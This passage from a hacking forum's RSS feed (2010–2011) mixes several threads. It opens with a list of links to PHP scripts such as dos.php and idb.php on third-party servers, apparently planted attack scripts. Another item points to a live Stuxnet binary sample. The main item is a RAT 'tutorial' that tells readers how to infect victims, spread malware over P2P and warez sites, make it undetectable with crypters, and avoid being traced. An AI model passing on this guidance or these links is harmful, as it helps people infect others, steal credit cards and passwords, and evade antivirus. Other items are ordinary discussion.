href="http://64.20.35.170/~ilulhard/idb.php">http://64.20.35.170/~ilulhard/idb.php</a><br><a class="postlink" rel="nofollow" href="http://www.gzpc120.com/index.php">http://www.gzpc120.com/index.php</a><br><a class="postlink" rel="nofollow" href="http://goldentouch5.com/contact/xdp.php">http://goldentouch5.com/contact/xdp.php</a><br><a class="postlink" rel="nofollow" href="http://mcgossip.info/test.php">http://mcgossip.info/test.php</a><br><a class="postlink" rel="nofollow" href="http://4on4.ca/dos.php">http://4on4.ca/dos.php</a><br><a class="postlink" rel="nofollow" href="http://bcsasquatch.ca/dos.php">http://bcsasquatch.ca/dos.php</a><br><a class="postlink" rel="nofollow" href="http://atlantics.ca/dos.php">http://atlantics.ca/dos.php</a><br><a class="postlink" rel="nofollow" href="http://174.121.134.58/~wewill/idb.php">http://174.121.134.58/~wewill/idb.php</a><br>Updating Thanks, Please Wait Say 'Thank You!' for this post. [/align]]]></description>
   </item>
   <item>
      <title>Part of Stuxnet Binary</title>
      <link>http://iexploit.org/index.php?p=/discussion/2311/part-of-stuxnet-binary</link>
      <pubDate>Tue, 22 Feb 2011 22:09:05 -0500</pubDate>
      <dc:creator>Xin</dc:creator>
      <guid isPermaLink="false">2311@/index.php?p=/discussions</guid>
      <description><![CDATA[So i was browsing other forums and found a link to this, <br><br>Its part of the stuxnet binary, for you to try and dissect if you want, dont run it as its still active and will infect your computer.<br><br><a class="postlink" rel="nofollow" href="http://forum.tuts4you.com/index.php?showtopic=23965">http://forum.tuts4you.com/index.php?showtopic=23965</a>]]></description>
   </item>
   <item>
      <title>Some questions/answers related to Stuxnet worm</title>
      <link>http://iexploit.org/index.php?p=/discussion/2005/some-questionsanswers-related-to-stuxnet-worm</link>
      <pubDate>Mon, 03 Jan 2011 08:08:02 -0500</pubDate>
      <dc:creator>Legend_Xeon</dc:creator>
      <guid isPermaLink="false">2005@/index.php?p=/discussions</guid>
      <description><![CDATA[Recently i saw an article on Stuxnet worm that created havoc in many industrial installations using Siemens Simatic PLC emulator.<br>I found it very very interesting and would like to share here.<br><br>There's the link:- <a class="postlink" rel="nofollow" href="http://www.f-secure.com/weblog/archives/00002040.html">http://www.f-secure.com/weblog/archives/00002040.html</a>]]></description>
   </item>
   <item>
      <title>Does malwares emits any kind of software user agents?</title>
      <link>http://iexploit.org/index.php?p=/discussion/1646/does-malwares-emits-any-kind-of-software-user-agents</link>
      <pubDate>Mon, 08 Nov 2010 20:57:53 -0500</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">1646@/index.php?p=/discussions</guid>
      <description><![CDATA[As the title says i Need to know whether malwares like RAT'S ,key-loggers,shells,trojan horses or what-ever kind of software connecting to<br />internet emits "user agents" from it's software to identify itself?<br /><br />is this true?<br /><br />I tought only browser's can emit user-agents from their respective softwares,but i am not sure about the other software Application being connected to the internet...<br /><br />I am bit-confused ,So i decided to ask here...<br /><br /><br />Hope some one may clear my doubt...]]></description>
   </item>
   <item>
      <title>About RAT</title>
      <link>http://iexploit.org/index.php?p=/discussion/1249/about-rat</link>
      <pubDate>Mon, 20 Sep 2010 05:20:48 -0400</pubDate>
      <dc:creator>WhizKidz</dc:creator>
      <guid isPermaLink="false">1249@/index.php?p=/discussions</guid>
      <description><![CDATA[Hello IExploit<br /><br />In this tutorial you going to learn more about RAT(s) and how they work. Well RAT(s) are usually used for hacking, and they are detected as backdoors.<br /><br />Popular RAT programs<br /><br />[x]Cerberus Rat<br />[x]ProRat<br />[x]Poison Ivy<br />[x]Turkojan Gold Rat<br />[x]Sub Seven<br />[x]NetBus RAT<br />[x]Spy-Net<br />[x]LostDoor<br />[x]BitFrost<br />[x]Nuclear RAT<br />[x]Bandock<br />[x]Pain Rat<br />[x]Beast<br />[x]Optix Pro<br />[x]DARKMOON<br />[x]Net-Devil<br />[x]Apocalypse Rat<br />[x]CyberGate<br />[x]Bandook<br />[x]Shark<br /><br />You can find really good RATs, here on HackForums for free. Also there's private version which are Fully Undetectable from AV's, but still you can find some really good RATs for free. You will only need file Crypter to make them FUD again.<br /><br />Remote Administrator Tools Q&amp;A.<br /><br />Q - Whats RAT?<br />A - A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC's, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.<br /><br />Q - How they work?<br />A - Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).<br /><br />Q - Download?<br />A - Well you can find any type of RAT here, on HackForums. To download click spoiler(down) and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.<br /><br />Q - How do I control server?<br />A - Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.<br /><br />Q - What do I need to setup RAT?<br />A - Well, you will need Windows OS, open port &amp; RAT. To forward your port scroll for tutorial link or click this URL.<br /><br />Q - How do I port forward?<br />A - Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin &amp; Password: Admin), open port forward page and write port you want and your IP. Well that's all you need to do and now you got open port<br /><br />Q - How do I make my server FUD?<br />A - If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.<br /><br />Q - How do I remove server if I infect myself?<br />A - When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes' Anti-Malware and scan whole computer for trojan.<br /><br />Q - Legal or illegal?<br />A - Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).<br /><br />Legal:<br />TeamViewer - Access any remote computer via Internet just like sitting in front of it - even through firewalls.<br />UltraVNC - Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance<br />Ammyy Admin - Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote<br />Mikogo - Mikogo is an Online Meeting, Web Conferencing &amp; Remote Support tool where you can share your screen with 10 participants in real-time over the Web.<br /><br />Illegal:<br />Spy-Net<br />Cerberus Rat<br />CyberGate Rat<br />SubSeven<br />Turkojan<br />ProRat<br />Q - Where and how do I spread?<br />A - There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.<br /><br />Q - Whats DNS host?<br />A - The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.<br /><br />Q - What can RAT do?<br />A - Here is list of basic features:<br />â€¢ Manage files<br />â€¢ Control web browser(Change homepage, open site etc.)<br />â€¢ Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)<br />â€¢ Get passwords, credit card numbers or private data etc.<br />â€¢ View and remote control desktop<br />â€¢ Record camera &amp; sound<br />â€¢ Control mouse<br />â€¢ Delete, rename, download, upload or move files<br />Q - What's reverse Connection?<br />A - A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.<br /><br />Q - Whats direct connection?<br />A - A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.<br /><br />Q - Can I get traced when I rat somebody?<br />A - Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it's really hard to trace, because PC usually got over 300 connections. So don't worry.]]></description>
   </item>
   <item>
      <title>Anyone agree with this?</title>
      <link>http://iexploit.org/index.php?p=/discussion/1787/anyone-agree-with-this</link>
      <pubDate>Thu, 09 Dec 2010 21:28:39 -0500</pubDate>
      <dc:creator>McKittrick</dc:creator>
      <guid isPermaLink="false">1787@/index.php?p=/discussions</guid>
      <description><![CDATA[i saw mention of viruses and coding them on here as of late. do any of you agree with me, that the days of real, true, damaging viruses are over? think about it. since the beginning of 2000, how many real hardcore viruses have you seen out there that are not just more forms of shitty propogation worms or annoying spy/malware?! i get upset everytime i hear "you better scan yourself for viruses or else" blah blah. i have yet to ever be infected with anything that can even be considered "serious". if you want to know a true virus that actually could take out a pc, go read up on the Chernobyl virus. how many virus' out there besides the new Stuxxnet actually attack at the hardware layer? how many out there write your MBR/hardrive to zeroes?<br /><br /> like i said, most of the crap out there now is boring, predictable malware garbage that can be easily detected with Process Explorer, then extrapolated. i doubt you will really see anything of substance from virus writers out there today. all they care about is spam/email propogation and infecting you with more ads saying "clean your registry or else". if you don't agree--that's fine]]></description>
   </item>
   <item>
      <title>A short history of Christmas malware</title>
      <link>http://iexploit.org/index.php?p=/discussion/1804/a-short-history-of-christmas-malware</link>
      <pubDate>Wed, 15 Dec 2010 18:46:55 -0500</pubDate>
      <dc:creator>Sh3llc0d3</dc:creator>
      <guid isPermaLink="false">1804@/index.php?p=/discussions</guid>
      <description><![CDATA[Not really much help to anyone but thought some of you may be interested in this article..<br><br><a class="postlink" rel="nofollow" href="http://nakedsecurity.sophos.com/2010/12/15/christmas-malware-short-history/">http://nakedsecurity.sophos.com/2010/12 ... t-history/</a>]]></description>
   </item>
   </channel>
</rss>